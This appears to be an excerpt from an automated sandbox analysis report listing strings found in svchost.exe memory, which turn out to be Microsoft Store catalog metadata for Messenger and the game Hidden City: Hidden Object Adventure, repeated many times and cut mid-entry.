(https://messenger.com/)","ProductTitle":"Messenger","SearchTitles":[],"Language":"en-us","Markets":["US","DZ","AR","AU","AT","BH","BD","BE","BR","BG","CA","CL","CN","CO","CR","HR","CY","CZ","DK","EG","EE","FI","FR","DE","GR","GT","HK","HU","IS","IN","ID","IQ","IE","IL","IT","JP","JO","KZ","KE","KW","LV","LB","LI","LT","LU","MY","MT","MR","MX","MA","NL","NZ","NG","NO","OM","PK","PE","PH","PL","PT","QA","RO","RU","SA","RS","SG","SK","SI","ZA","KR","ES","SE","CH","TW","TH","TT","TN","TR","UA","AE","GB","VN","YE","LY","LK","UY","VE","AF","AX","AL","AS","AO","AI","AQ","AG","AM","AW","BO","BQ","BA","BW","BV","IO","BN","BF","BI","KH","CM","CV","KY","CF","TD","TL","DJ","DM","DO","EC","SV","GQ","ER","ET","FK","FO","FJ","GF","PF","TF","GA","GM","GE","GH","GI","GL","GD","GP","GU","GG","GN","GW","GY","HT","HM","HN","AZ","BS","BB","BY","BZ","BJ","BM","BT","KM","CG","CD","CK","CX","CC","CI","CW","JM","SJ","JE","KI","KG","LA","LS","LR","MO","MK","MG","MW","IM","MH","MQ","MU","YT","FM","MD","MN","MS","MZ","MM","NA","NR","NP","MV","ML","NC","NI","NE","NU","NF","PW","PS","PA","PG","PY","RE","RW","BL","MF","WS","ST","SN","MP","PN","SX","SB","SO","SC","SL","GS","SH","KN","LC","PM","VC","TJ","TZ","TG","TK","TO","TM","TC","TV","UM","UG","VI","VG","WF","EH","ZM","ZW","UZ","VU","SR","SZ","AD","MC","SM","ME","VA","NEUTRAL"]}],"MarketProperties":[{"RelatedProducts":[],"Markets":["US"]}],"ProductASchema":"Product;3","ProductBSchema":"ProductUnifiedApp;3","ProductId":"9WZDNCRF0083","Properties":{"PackageFamilyName":"Facebook.317180B0BB486_8xx8rvfyw5nnt","PackageIdentityName":"FACEBOOK.317180B0BB486","PublisherCertificateName":"CN=6E08453F-9BA7-4311-999C-D22FBA2FB1B8","XboxCrossGenSetId":null,"XboxConsoleGenOptimized":null,"XboxConsoleGenCompatible":null},"AlternateIds":[{"IdType":"LegacyWindowsStoreProductId","Value":"c6a9fa5c-20a2-4e12-904d-edd408657dc8"},{"IdType":"LegacyWindowsPhoneProductId","Value":"3219d30d-4a23-4f58-a91c-c44b04e6a0c7"},{"IdType":"XboxTitleId","Value":"2004208728"}],"IngestionSource":"DCE","IsMicrosoftProduct":false,"PreferredSkuId":"0010","ProductType":"Application","ValidationData":{"PassedValidation":false,"RevisionId":"2021-04-06T17:58:28.3925008Z\|\|.\|\|9f1af5de-a917-4d59-b623-fd59991517bf\|\|1152921505693355901\|\|Null\|\|fullrelease","ValidationResultUri":""},"MerchandizingTags":[],"PartD":"","ProductFamily":"Apps","ProductKind":"Application","DisplaySkuAvailabilities":[{"Sku":{"LastModifiedDate":"2021-04-06T17:57:25.3126054Z","LocalizedProperties":[{"SkuDescription":"Made for big screens and close connections. Get access to free texting, and high-quality voice & video chat built specifically for desktop.\r\n\r\nMADE FOR DESKTOP, MADE
Source: svchost.exe, 0000000F.00000003.439186439.00000221A3B95000.00000004.00000001.sdmp	String found in binary or memory: !\r\nCollect them all! Search for \"g5\" in Windows Store! \r\n____________________________\r\n\r\nVISIT US: www.g5e.com\r\nWATCH US: www.youtube.com/g5enter\r\nFIND US: www.facebook.com/HiddenCityGame\r\nJOIN US: https://instagram.com/hiddencity_\r\nFOLLOW US: www.twitter.com/g5games\r\nTerms of Service: http://www.g5e.com/termsofservice \r\nG5 End User License Supplemental Terms: http://www.g5e.com/G5_End_User_License_Supplemental_Terms","ProductTitle":"Hidden City: Hidden Object Adventure","SearchTitles":[{"SearchTitleString":"find hidden objects ","SearchTitleType":"SearchHint"},{"SearchTitleString":"junes pearls free ","SearchTitleType":"SearchHint"},{"SearchTitleString":"ispy notes peril","SearchTitleType":"SearchHint"},{"SearchTitleString":"seekers mystery ","SearchTitleType":"SearchHint"},{"SearchTitleString":"detective manor solving","SearchTitleType":"SearchHint"},{"SearchTitleString":"sherlock hotel spot it","SearchTitleType":"SearchHint"},{"SearchTitleString":"puzzle game journey ","SearchTitleType":"SearchHint"}],"Language":"en","Markets":["US","DZ","AR","AU","AT","BH","BD","BE","BR","BG","CA","CL","CN","CO","CR","HR","CY","CZ","DK","EG","EE","FI","FR","DE","GR","GT","HK","HU","IS","IN","ID","IQ","IE","IL","IT","JP","JO","KZ","KE","KW","LV","LB","LI","LT","LU","MY","MT","MR","MX","MA","NL","NZ","NG","NO","OM","PK","PE","PH","PL","PT","QA","RO","RU","SA","RS","SG","SK","SI","ZA","KR","ES","SE","CH","TW","TH","TT","TN","TR","UA","AE","GB","VN","YE","LY","LK","UY","VE","AF","AX","AL","AS","AO","AI","AQ","AG","AM","AW","BO","BQ","BA","BW","BV","IO","BN","BF","BI","KH","CM","CV","KY","CF","TD","TL","DJ","DM","DO","EC","SV","GQ","ER","ET","FK","FO","FJ","GF","PF","TF","GA","GM","GE","GH","GI","GL","GD","GP","GU","GG","GN","GW","GY","HT","HM","HN","AZ","BS","BB","BY","BZ","BJ","BM","BT","KM","CG","CD","CK","CX","CC","CI","CW","JM","SJ","JE","KI","KG","LA","LS","LR","MO","MK","MG","MW","IM","MH","MQ","MU","YT","FM","MD","MN","MS","MZ","MM","NA","NR","NP","MV","ML","NC","NI","NE","NU","NF","PW","PS","PA","PG","PY","RE","RW","BL","MF","WS","ST","SN","MP","PN","SX","SB","SO","SC","SL","GS","SH","KN","LC","PM","VC","TJ","TZ","TG","TK","TO","TM","TC","TV","UM","UG","VI","VG","WF","EH","ZM","ZW","UZ","VU","SR","SZ","AD","MC","SM","ME","VA","NEUTRAL"]}],"MarketProperties":[{"RelatedProducts":[],"Markets":["US"]}],"ProductASchema":"Product;3","ProductBSchema":"ProductGame;1","ProductId":"9NBLGGH6J6VK","Properties":{"PackageFamilyName":"828B5831.HiddenCityMysteryofShadows_ytsefhwckbdv6","PackageIdentityName":"828B5831.HiddenCityMysteryofShadows","PublisherCertificateName":"CN=A4F05332-BE3A-4155-B996-B100171CD4B1","XboxCrossGenSetId":null,"XboxConsoleGenOptimized":null,"XboxConsoleGenCompatible":null},"AlternateIds":[{"IdType":"LegacyWindowsStoreProductId","Value":"8cb666bc-49d3-4722-bb14-5643aee3a729"},{"IdType":"LegacyWindowsPhoneProductId","Value":"94ad5279-e84a-4d40-b7cf-c6f16f916e6c"},{"IdType":"XboxTitleId","Value":"2124184622"}],"IngestionSourc
Source: svchost.exe, 0000000F.00000003.439186439.00000221A3B95000.00000004.00000001.sdmp	String found in binary or memory: !\r\nCollect them all! Search for \"g5\" in Windows Store! \r\n____________________________\r\n\r\nVISIT US: www.g5e.com\r\nWATCH US: www.youtube.com/g5enter\r\nFIND US: www.facebook.com/HiddenCityGame\r\nJOIN US: https://instagram.com/hiddencity_\r\nFOLLOW US: www.twitter.com/g5games\r\nTerms of Service: http://www.g5e.com/termsofservice \r\nG5 End User License Supplemental Terms: http://www.g5e.com/G5_End_User_License_Supplemental_Terms","ProductTitle":"Hidden City: Hidden Object Adventure","SearchTitles":[{"SearchTitleString":"find hidden objects ","SearchTitleType":"SearchHint"},{"SearchTitleString":"junes pearls free ","SearchTitleType":"SearchHint"},{"SearchTitleString":"ispy notes peril","SearchTitleType":"SearchHint"},{"SearchTitleString":"seekers mystery ","SearchTitleType":"SearchHint"},{"SearchTitleString":"detective manor solving","SearchTitleType":"SearchHint"},{"SearchTitleString":"sherlock hotel spot it","SearchTitleType":"SearchHint"},{"SearchTitleString":"puzzle game journey ","SearchTitleType":"SearchHint"}],"Language":"en","Markets":["US","DZ","AR","AU","AT","BH","BD","BE","BR","BG","CA","CL","CN","CO","CR","HR","CY","CZ","DK","EG","EE","FI","FR","DE","GR","GT","HK","HU","IS","IN","ID","IQ","IE","IL","IT","JP","JO","KZ","KE","KW","LV","LB","LI","LT","LU","MY","MT","MR","MX","MA","NL","NZ","NG","NO","OM","PK","PE","PH","PL","PT","QA","RO","RU","SA","RS","SG","SK","SI","ZA","KR","ES","SE","CH","TW","TH","TT","TN","TR","UA","AE","GB","VN","YE","LY","LK","UY","VE","AF","AX","AL","AS","AO","AI","AQ","AG","AM","AW","BO","BQ","BA","BW","BV","IO","BN","BF","BI","KH","CM","CV","KY","CF","TD","TL","DJ","DM","DO","EC","SV","GQ","ER","ET","FK","FO","FJ","GF","PF","TF","GA","GM","GE","GH","GI","GL","GD","GP","GU","GG","GN","GW","GY","HT","HM","HN","AZ","BS","BB","BY","BZ","BJ","BM","BT","KM","CG","CD","CK","CX","CC","CI","CW","JM","SJ","JE","KI","KG","LA","LS","LR","MO","MK","MG","MW","IM","MH","MQ","MU","YT","FM","MD","MN","MS","MZ","MM","NA","NR","NP","MV","ML","NC","NI","NE","NU","NF","PW","PS","PA","PG","PY","RE","RW","BL","MF","WS","ST","SN","MP","PN","SX","SB","SO","SC","SL","GS","SH","KN","LC","PM","VC","TJ","TZ","TG","TK","TO","TM","TC","TV","UM","UG","VI","VG","WF","EH","ZM","ZW","UZ","VU","SR","SZ","AD","MC","SM","ME","VA","NEUTRAL"]}],"MarketProperties":[{"RelatedProducts":[],"Markets":["US"]}],"ProductASchema":"Product;3","ProductBSchema":"ProductGame;1","ProductId":"9NBLGGH6J6VK","Properties":{"PackageFamilyName":"828B5831.HiddenCityMysteryofShadows_ytsefhwckbdv6","PackageIdentityName":"828B5831.HiddenCityMysteryofShadows","PublisherCertificateName":"CN=A4F05332-BE3A-4155-B996-B100171CD4B1","XboxCrossGenSetId":null,"XboxConsoleGenOptimized":null,"XboxConsoleGenCompatible":null},"AlternateIds":[{"IdType":"LegacyWindowsStoreProductId","Value":"8cb666bc-49d3-4722-bb14-5643aee3a729"},{"IdType":"LegacyWindowsPhoneProductId","Value":"94ad5279-e84a-4d40-b7cf-c6f16f916e6c"},{"IdType":"XboxTitleId","Value":"2124184622"}],"IngestionSourc
Source: svchost.exe, 0000000F.00000003.439186439.00000221A3B95000.00000004.00000001.sdmp	String found in binary or memory: !\r\nCollect them all! Search for \"g5\" in Windows Store! \r\n____________________________\r\n\r\nVISIT US: www.g5e.com\r\nWATCH US: www.youtube.com/g5enter\r\nFIND US: www.facebook.com/HiddenCityGame\r\nJOIN US: https://instagram.com/hiddencity_\r\nFOLLOW US: www.twitter.com/g5games\r\nTerms of Service: http://www.g5e.com/termsofservice \r\nG5 End User License Supplemental Terms: http://www.g5e.com/G5_End_User_License_Supplemental_Terms","ProductTitle":"Hidden City: Hidden Object Adventure","SearchTitles":[{"SearchTitleString":"find hidden objects ","SearchTitleType":"SearchHint"},{"SearchTitleString":"junes pearls free ","SearchTitleType":"SearchHint"},{"SearchTitleString":"ispy notes peril","SearchTitleType":"SearchHint"},{"SearchTitleString":"seekers mystery ","SearchTitleType":"SearchHint"},{"SearchTitleString":"detective manor solving","SearchTitleType":"SearchHint"},{"SearchTitleString":"sherlock hotel spot it","SearchTitleType":"SearchHint"},{"SearchTitleString":"puzzle game journey ","SearchTitleType":"SearchHint"}],"Language":"en","Markets":["US","DZ","AR","AU","AT","BH","BD","BE","BR","BG","CA","CL","CN","CO","CR","HR","CY","CZ","DK","EG","EE","FI","FR","DE","GR","GT","HK","HU","IS","IN","ID","IQ","IE","IL","IT","JP","JO","KZ","KE","KW","LV","LB","LI","LT","LU","MY","MT","MR","MX","MA","NL","NZ","NG","NO","OM","PK","PE","PH","PL","PT","QA","RO","RU","SA","RS","SG","SK","SI","ZA","KR","ES","SE","CH","TW","TH","TT","TN","TR","UA","AE","GB","VN","YE","LY","LK","UY","VE","AF","AX","AL","AS","AO","AI","AQ","AG","AM","AW","BO","BQ","BA","BW","BV","IO","BN","BF","BI","KH","CM","CV","KY","CF","TD","TL","DJ","DM","DO","EC","SV","GQ","ER","ET","FK","FO","FJ","GF","PF","TF","GA","GM","GE","GH","GI","GL","GD","GP","GU","GG","GN","GW","GY","HT","HM","HN","AZ","BS","BB","BY","BZ","BJ","BM","BT","KM","CG","CD","CK","CX","CC","CI","CW","JM","SJ","JE","KI","KG","LA","LS","LR","MO","MK","MG","MW","IM","MH","MQ","MU","YT","FM","MD","MN","MS","MZ","MM","NA","NR","NP","MV","ML","NC","NI","NE","NU","NF","PW","PS","PA","PG","PY","RE","RW","BL","MF","WS","ST","SN","MP","PN","SX","SB","SO","SC","SL","GS","SH","KN","LC","PM","VC","TJ","TZ","TG","TK","TO","TM","TC","TV","UM","UG","VI","VG","WF","EH","ZM","ZW","UZ","VU","SR","SZ","AD","MC","SM","ME","VA","NEUTRAL"]}],"MarketProperties":[{"RelatedProducts":[],"Markets":["US"]}],"ProductASchema":"Product;3","ProductBSchema":"ProductGame;1","ProductId":"9NBLGGH6J6VK","Properties":{"PackageFamilyName":"828B5831.HiddenCityMysteryofShadows_ytsefhwckbdv6","PackageIdentityName":"828B5831.HiddenCityMysteryofShadows","PublisherCertificateName":"CN=A4F05332-BE3A-4155-B996-B100171CD4B1","XboxCrossGenSetId":null,"XboxConsoleGenOptimized":null,"XboxConsoleGenCompatible":null},"AlternateIds":[{"IdType":"LegacyWindowsStoreProductId","Value":"8cb666bc-49d3-4722-bb14-5643aee3a729"},{"IdType":"LegacyWindowsPhoneProductId","Value":"94ad5279-e84a-4d40-b7cf-c6f16f916e6c"},{"IdType":"XboxTitleId","Value":"2124184622"}],"IngestionSourc
Source: svchost.exe, 0000000F.00000003.439186439.00000221A3B95000.00000004.00000001.sdmp	String found in binary or memory: !\r\nCollect them all! Search for \"g5\" in Windows Store! \r\n____________________________\r\n\r\nVISIT US: www.g5e.com\r\nWATCH US: www.youtube.com/g5enter\r\nFIND US: www.facebook.com/HiddenCityGame\r\nJOIN US: https://instagram.com/hiddencity_\r\nFOLLOW US: www.twitter.com/g5games\r\nTerms of Service: http://www.g5e.com/termsofservice \r\nG5 End User License Supplemental Terms: http://www.g5e.com/G5_End_User_License_Supplemental_Terms","SkuTitle":"Hidden City: Hidden Object Adventure","Language":"en","Markets":["US","DZ","AR","AU","AT","BH","BD","BE","BR","BG","CA","CL","CN","CO","CR","HR","CY","CZ","DK","EG","EE","FI","FR","DE","GR","GT","HK","HU","IS","IN","ID","IQ","IE","IL","IT","JP","JO","KZ","KE","KW","LV","LB","LI","LT","LU","MY","MT","MR","MX","MA","NL","NZ","NG","NO","OM","PK","PE","PH","PL","PT","QA","RO","RU","SA","RS","SG","SK","SI","ZA","KR","ES","SE","CH","TW","TH","TT","TN","TR","UA","AE","GB","VN","YE","LY","LK","UY","VE","AF","AX","AL","AS","AO","AI","AQ","AG","AM","AW","BO","BQ","BA","BW","BV","IO","BN","BF","BI","KH","CM","CV","KY","CF","TD","TL","DJ","DM","DO","EC","SV","GQ","ER","ET","FK","FO","FJ","GF","PF","TF","GA","GM","GE","GH","GI","GL","GD","GP","GU","GG","GN","GW","GY","HT","HM","HN","AZ","BS","BB","BY","BZ","BJ","BM","BT","KM","CG","CD","CK","CX","CC","CI","CW","JM","SJ","JE","KI","KG","LA","LS","LR","MO","MK","MG","MW","IM","MH","MQ","MU","YT","FM","MD","MN","MS","MZ","MM","NA","NR","NP","MV","ML","NC","NI","NE","NU","NF","PW","PS","PA","PG","PY","RE","RW","BL","MF","WS","ST","SN","MP","PN","SX","SB","SO","SC","SL","GS","SH","KN","LC","PM","VC","TJ","TZ","TG","TK","TO","TM","TC","TV","UM","UG","VI","VG","WF","EH","ZM","ZW","UZ","VU","SR","SZ","AD","MC","SM","ME","VA","NEUTRAL"]}],"ProductId":"9NBLGGH6J6VK","Properties":{"FulfillmentData":{"ProductId":"9NBLGGH6J6VK","WuCategoryId":"e15668ee-9cc1-4bc2-ba76-e91eb1a11e95","PackageFamilyName":"828B5831.HiddenCityMysteryofShadows_ytsefhwckbdv6","SkuId":"0011"},"FulfillmentType":null,"FulfillmentPluginId":null,"Packages":[{"Applications":[{"ApplicationId":"App"}],"Architectures":["x86"],"Capabilities":["internetClient"],"ExperienceIds":[],"MaxDownloadSizeInBytes":507060394,"PackageFormat":"EAppxBundle","PackageFamilyName":"828B5831.HiddenCityMysteryofShadows_ytsefhwckbdv6","MainPackageFamilyNameForDlc":null,"PackageFullName":"828B5831.HiddenCityMysteryofShadows_1.40.4001.70_neutral_~_ytsefhwckbdv6","PackageId":"448e913e-e6bd-69c2-2c7f-25b80795f801-X86","PackageRank":30011,"PlatformDependencies":[{"MaxTested":2814750931222528,"MinVersion":2814750438195200,"PlatformName":"Windows.Xbox"}],"PlatformDependencyXmlBlob":"{\"blob.version\":1688867040526336,\"content.bundledPackages\":[\"828B5831.HiddenCityMysteryofShadows_1.40.4001.70_x86__ytsefhwckbdv6\"],\"content.isMain\":false,\"content.packageId\":\"828B5831.HiddenCityMysteryofShadows_1.40.4001.70_neutral_~_ytsefhwckbdv6\",\"content.productId\":\"94ad5279-e84a-4d40-b7cf-c6f16f916e6c\",\"content.targetPlatforms\":[{\"platf
Source: svchost.exe, 0000000F.00000003.439186439.00000221A3B95000.00000004.00000001.sdmp	String found in binary or memory: !\r\nCollect them all! Search for \"g5\" in Windows Store! \r\n____________________________\r\n\r\nVISIT US: www.g5e.com\r\nWATCH US: www.youtube.com/g5enter\r\nFIND US: www.facebook.com/HiddenCityGame\r\nJOIN US: https://instagram.com/hiddencity_\r\nFOLLOW US: www.twitter.com/g5games\r\nTerms of Service: http://www.g5e.com/termsofservice \r\nG5 End User License Supplemental Terms: http://www.g5e.com/G5_End_User_License_Supplemental_Terms","SkuTitle":"Hidden City: Hidden Object Adventure","Language":"en","Markets":["US","DZ","AR","AU","AT","BH","BD","BE","BR","BG","CA","CL","CN","CO","CR","HR","CY","CZ","DK","EG","EE","FI","FR","DE","GR","GT","HK","HU","IS","IN","ID","IQ","IE","IL","IT","JP","JO","KZ","KE","KW","LV","LB","LI","LT","LU","MY","MT","MR","MX","MA","NL","NZ","NG","NO","OM","PK","PE","PH","PL","PT","QA","RO","RU","SA","RS","SG","SK","SI","ZA","KR","ES","SE","CH","TW","TH","TT","TN","TR","UA","AE","GB","VN","YE","LY","LK","UY","VE","AF","AX","AL","AS","AO","AI","AQ","AG","AM","AW","BO","BQ","BA","BW","BV","IO","BN","BF","BI","KH","CM","CV","KY","CF","TD","TL","DJ","DM","DO","EC","SV","GQ","ER","ET","FK","FO","FJ","GF","PF","TF","GA","GM","GE","GH","GI","GL","GD","GP","GU","GG","GN","GW","GY","HT","HM","HN","AZ","BS","BB","BY","BZ","BJ","BM","BT","KM","CG","CD","CK","CX","CC","CI","CW","JM","SJ","JE","KI","KG","LA","LS","LR","MO","MK","MG","MW","IM","MH","MQ","MU","YT","FM","MD","MN","MS","MZ","MM","NA","NR","NP","MV","ML","NC","NI","NE","NU","NF","PW","PS","PA","PG","PY","RE","RW","BL","MF","WS","ST","SN","MP","PN","SX","SB","SO","SC","SL","GS","SH","KN","LC","PM","VC","TJ","TZ","TG","TK","TO","TM","TC","TV","UM","UG","VI","VG","WF","EH","ZM","ZW","UZ","VU","SR","SZ","AD","MC","SM","ME","VA","NEUTRAL"]}],"ProductId":"9NBLGGH6J6VK","Properties":{"FulfillmentData":{"ProductId":"9NBLGGH6J6VK","WuCategoryId":"e15668ee-9cc1-4bc2-ba76-e91eb1a11e95","PackageFamilyName":"828B5831.HiddenCityMysteryofShadows_ytsefhwckbdv6","SkuId":"0011"},"FulfillmentType":null,"FulfillmentPluginId":null,"Packages":[{"Applications":[{"ApplicationId":"App"}],"Architectures":["x86"],"Capabilities":["internetClient"],"ExperienceIds":[],"MaxDownloadSizeInBytes":507060394,"PackageFormat":"EAppxBundle","PackageFamilyName":"828B5831.HiddenCityMysteryofShadows_ytsefhwckbdv6","MainPackageFamilyNameForDlc":null,"PackageFullName":"828B5831.HiddenCityMysteryofShadows_1.40.4001.70_neutral_~_ytsefhwckbdv6","PackageId":"448e913e-e6bd-69c2-2c7f-25b80795f801-X86","PackageRank":30011,"PlatformDependencies":[{"MaxTested":2814750931222528,"MinVersion":2814750438195200,"PlatformName":"Windows.Xbox"}],"PlatformDependencyXmlBlob":"{\"blob.version\":1688867040526336,\"content.bundledPackages\":[\"828B5831.HiddenCityMysteryofShadows_1.40.4001.70_x86__ytsefhwckbdv6\"],\"content.isMain\":false,\"content.packageId\":\"828B5831.HiddenCityMysteryofShadows_1.40.4001.70_neutral_~_ytsefhwckbdv6\",\"content.productId\":\"94ad5279-e84a-4d40-b7cf-c6f16f916e6c\",\"content.targetPlatforms\":[{\"platf
Source: svchost.exe, 0000000F.00000003.439186439.00000221A3B95000.00000004.00000001.sdmp	String found in binary or memory: !\r\nCollect them all! Search for \"g5\" in Windows Store! \r\n____________________________\r\n\r\nVISIT US: www.g5e.com\r\nWATCH US: www.youtube.com/g5enter\r\nFIND US: www.facebook.com/HiddenCityGame\r\nJOIN US: https://instagram.com/hiddencity_\r\nFOLLOW US: www.twitter.com/g5games\r\nTerms of Service: http://www.g5e.com/termsofservice \r\nG5 End User License Supplemental Terms: http://www.g5e.com/G5_End_User_License_Supplemental_Terms","SkuTitle":"Hidden City: Hidden Object Adventure","Language":"en","Markets":["US","DZ","AR","AU","AT","BH","BD","BE","BR","BG","CA","CL","CN","CO","CR","HR","CY","CZ","DK","EG","EE","FI","FR","DE","GR","GT","HK","HU","IS","IN","ID","IQ","IE","IL","IT","JP","JO","KZ","KE","KW","LV","LB","LI","LT","LU","MY","MT","MR","MX","MA","NL","NZ","NG","NO","OM","PK","PE","PH","PL","PT","QA","RO","RU","SA","RS","SG","SK","SI","ZA","KR","ES","SE","CH","TW","TH","TT","TN","TR","UA","AE","GB","VN","YE","LY","LK","UY","VE","AF","AX","AL","AS","AO","AI","AQ","AG","AM","AW","BO","BQ","BA","BW","BV","IO","BN","BF","BI","KH","CM","CV","KY","CF","TD","TL","DJ","DM","DO","EC","SV","GQ","ER","ET","FK","FO","FJ","GF","PF","TF","GA","GM","GE","GH","GI","GL","GD","GP","GU","GG","GN","GW","GY","HT","HM","HN","AZ","BS","BB","BY","BZ","BJ","BM","BT","KM","CG","CD","CK","CX","CC","CI","CW","JM","SJ","JE","KI","KG","LA","LS","LR","MO","MK","MG","MW","IM","MH","MQ","MU","YT","FM","MD","MN","MS","MZ","MM","NA","NR","NP","MV","ML","NC","NI","NE","NU","NF","PW","PS","PA","PG","PY","RE","RW","BL","MF","WS","ST","SN","MP","PN","SX","SB","SO","SC","SL","GS","SH","KN","LC","PM","VC","TJ","TZ","TG","TK","TO","TM","TC","TV","UM","UG","VI","VG","WF","EH","ZM","ZW","UZ","VU","SR","SZ","AD","MC","SM","ME","VA","NEUTRAL"]}],"ProductId":"9NBLGGH6J6VK","Properties":{"FulfillmentData":{"ProductId":"9NBLGGH6J6VK","WuCategoryId":"e15668ee-9cc1-4bc2-ba76-e91eb1a11e95","PackageFamilyName":"828B5831.HiddenCityMysteryofShadows_ytsefhwckbdv6","SkuId":"0011"},"FulfillmentType":null,"FulfillmentPluginId":null,"Packages":[{"Applications":[{"ApplicationId":"App"}],"Architectures":["x86"],"Capabilities":["internetClient"],"ExperienceIds":[],"MaxDownloadSizeInBytes":507060394,"PackageFormat":"EAppxBundle","PackageFamilyName":"828B5831.HiddenCityMysteryofShadows_ytsefhwckbdv6","MainPackageFamilyNameForDlc":null,"PackageFullName":"828B5831.HiddenCityMysteryofShadows_1.40.4001.70_neutral_~_ytsefhwckbdv6","PackageId":"448e913e-e6bd-69c2-2c7f-25b80795f801-X86","PackageRank":30011,"PlatformDependencies":[{"MaxTested":2814750931222528,"MinVersion":2814750438195200,"PlatformName":"Windows.Xbox"}],"PlatformDependencyXmlBlob":"{\"blob.version\":1688867040526336,\"content.bundledPackages\":[\"828B5831.HiddenCityMysteryofShadows_1.40.4001.70_x86__ytsefhwckbdv6\"],\"content.isMain\":false,\"content.packageId\":\"828B5831.HiddenCityMysteryofShadows_1.40.4001.70_neutral_~_ytsefhwckbdv6\",\"content.productId\":\"94ad5279-e84a-4d40-b7cf-c6f16f916e6c\",\"content.targetPlatforms\":[{\"platf
Source: svchost.exe, 0000000F.00000003.439276219.00000221A4002000.00000004.00000001.sdmp	String found in binary or memory: % Regular free updates with loads of new content\r\n____________________________ \r\n\r\nGame available in: English, French, Italian, German, Spanish, Portuguese, Brazilian Portuguese, Russian, Korean, Simplified Chinese, Traditional Chinese, Japanese, Arabic\r\n____________________________ \r\n\r\nSign up now for a weekly round-up of the best from G5 Games! www.g5e.com/e-mail\r\n____________________________ \r\n\r\nG5 Games - World of Adventures"!!\r\nCollect them all! Search for \"g5\" in Windows Store! \r\n____________________________\r\n\r\nVISIT US: www.g5e.com\r\nWATCH US: www.youtube.com/g5enter\r\nFIND US: www.facebook.com/HiddenCityGame\r\nJOIN US: https://instagram.com/hiddencity_\r\nFOLLOW US: www.twitter.com/g5games\r\nTerms of Service: http://www.g5e.com/termsofservice \r\nG5 End User License Supplemental Terms: http://www.g5e.com/G5_End_User_License_Supplemental_Terms","ProductTitle":"Hidden City: Hidden Object Adventure","SearchTitles":[{"SearchTitleString":"find hidden objects ","SearchTitleType":"SearchHint"},{"SearchTitleString":"junes pearls free ","SearchTitleType":"SearchHint"},{"SearchTitleString":"ispy notes peril","SearchTitleType":"SearchHint"},{"SearchTitleString":"seekers mystery ","SearchTitleType":"SearchHint"},{"SearchTitleString":"detective manor solving","SearchTitleType":"SearchHint"},{"SearchTitleString":"sherlock hotel spot it","SearchTitleType":"SearchHint"},{"SearchTitleString":"puzzle game journey ","SearchTitleType":"SearchHint"}],"Language":"en","Markets":["US","DZ","AR","AU","AT","BH","BD","BE","BR","BG","CA","CL","CN","CO","CR","HR","CY","CZ","DK","EG","EE","FI","FR","DE","GR","GT","HK","HU","IS","IN","ID","IQ","IE","IL","IT","JP","JO","KZ","KE","KW","LV","LB","LI","LT","LU","MY","MT","MR","MX","MA","NL","NZ","NG","NO","OM","PK","PE","PH","PL","PT","QA","RO","RU","SA","RS","SG","SK","SI","ZA","KR","ES","SE","CH","TW","TH","TT","TN","TR","UA","AE","GB","VN","YE","LY","LK","UY","VE","AF","AX","AL","AS","AO","AI","AQ","AG","AM","AW","BO","BQ","BA","BW","BV","IO","BN","BF","BI","KH","CM","CV","KY","CF","TD","TL","DJ","DM","DO","EC","SV","GQ","ER","ET","FK","FO","FJ","GF","PF","TF","GA","GM","GE","GH","GI","GL","GD","GP","GU","GG","GN","GW","GY","HT","HM","HN","AZ","BS","BB","BY","BZ","BJ","BM","BT","KM","CG","CD","CK","CX","CC","CI","CW","JM","SJ","JE","KI","KG","LA","LS","LR","MO","MK","MG","MW","IM","MH","MQ","MU","YT","FM","MD","MN","MS","MZ","MM","NA","NR","NP","MV","ML","NC","NI","NE","NU","NF","PW","PS","PA","PG","PY","RE","RW","BL","MF","WS","ST","SN","MP","PN","SX","SB","SO","SC","SL","GS","SH","KN","LC","PM","VC","TJ","TZ","TG","TK","TO","TM","TC","TV","UM","UG","VI","VG","WF","EH","ZM","ZW","UZ","VU","SR","SZ","AD","MC","SM","ME","VA","NEUTRAL"]}],"MarketProperties":[{"RelatedProducts":[],"Markets":["US"]}],"ProductASchema":"Product;3","ProductBSchema":"ProductGame;1","ProductId":"9NBLGGH6J6VK","Properties":{"PackageFamilyName":"828B5831.HiddenCityMysteryofShadows_ytsefhwckbdv6","PackageIdentityName
Source: svchost.exe, 0000000F.00000003.439276219.00000221A4002000.00000004.00000001.sdmp	String found in binary or memory: % Regular free updates with loads of new content\r\n____________________________ \r\n\r\nGame available in: English, French, Italian, German, Spanish, Portuguese, Brazilian Portuguese, Russian, Korean, Simplified Chinese, Traditional Chinese, Japanese, Arabic\r\n____________________________ \r\n\r\nSign up now for a weekly round-up of the best from G5 Games! www.g5e.com/e-mail\r\n____________________________ \r\n\r\nG5 Games - World of Adventures"!!\r\nCollect them all! Search for \"g5\" in Windows Store! \r\n____________________________\r\n\r\nVISIT US: www.g5e.com\r\nWATCH US: www.youtube.com/g5enter\r\nFIND US: www.facebook.com/HiddenCityGame\r\nJOIN US: https://instagram.com/hiddencity_\r\nFOLLOW US: www.twitter.com/g5games\r\nTerms of Service: http://www.g5e.com/termsofservice \r\nG5 End User License Supplemental Terms: http://www.g5e.com/G5_End_User_License_Supplemental_Terms","ProductTitle":"Hidden City: Hidden Object Adventure","SearchTitles":[{"SearchTitleString":"find hidden objects ","SearchTitleType":"SearchHint"},{"SearchTitleString":"junes pearls free ","SearchTitleType":"SearchHint"},{"SearchTitleString":"ispy notes peril","SearchTitleType":"SearchHint"},{"SearchTitleString":"seekers mystery ","SearchTitleType":"SearchHint"},{"SearchTitleString":"detective manor solving","SearchTitleType":"SearchHint"},{"SearchTitleString":"sherlock hotel spot it","SearchTitleType":"SearchHint"},{"SearchTitleString":"puzzle game journey ","SearchTitleType":"SearchHint"}],"Language":"en","Markets":["US","DZ","AR","AU","AT","BH","BD","BE","BR","BG","CA","CL","CN","CO","CR","HR","CY","CZ","DK","EG","EE","FI","FR","DE","GR","GT","HK","HU","IS","IN","ID","IQ","IE","IL","IT","JP","JO","KZ","KE","KW","LV","LB","LI","LT","LU","MY","MT","MR","MX","MA","NL","NZ","NG","NO","OM","PK","PE","PH","PL","PT","QA","RO","RU","SA","RS","SG","SK","SI","ZA","KR","ES","SE","CH","TW","TH","TT","TN","TR","UA","AE","GB","VN","YE","LY","LK","UY","VE","AF","AX","AL","AS","AO","AI","AQ","AG","AM","AW","BO","BQ","BA","BW","BV","IO","BN","BF","BI","KH","CM","CV","KY","CF","TD","TL","DJ","DM","DO","EC","SV","GQ","ER","ET","FK","FO","FJ","GF","PF","TF","GA","GM","GE","GH","GI","GL","GD","GP","GU","GG","GN","GW","GY","HT","HM","HN","AZ","BS","BB","BY","BZ","BJ","BM","BT","KM","CG","CD","CK","CX","CC","C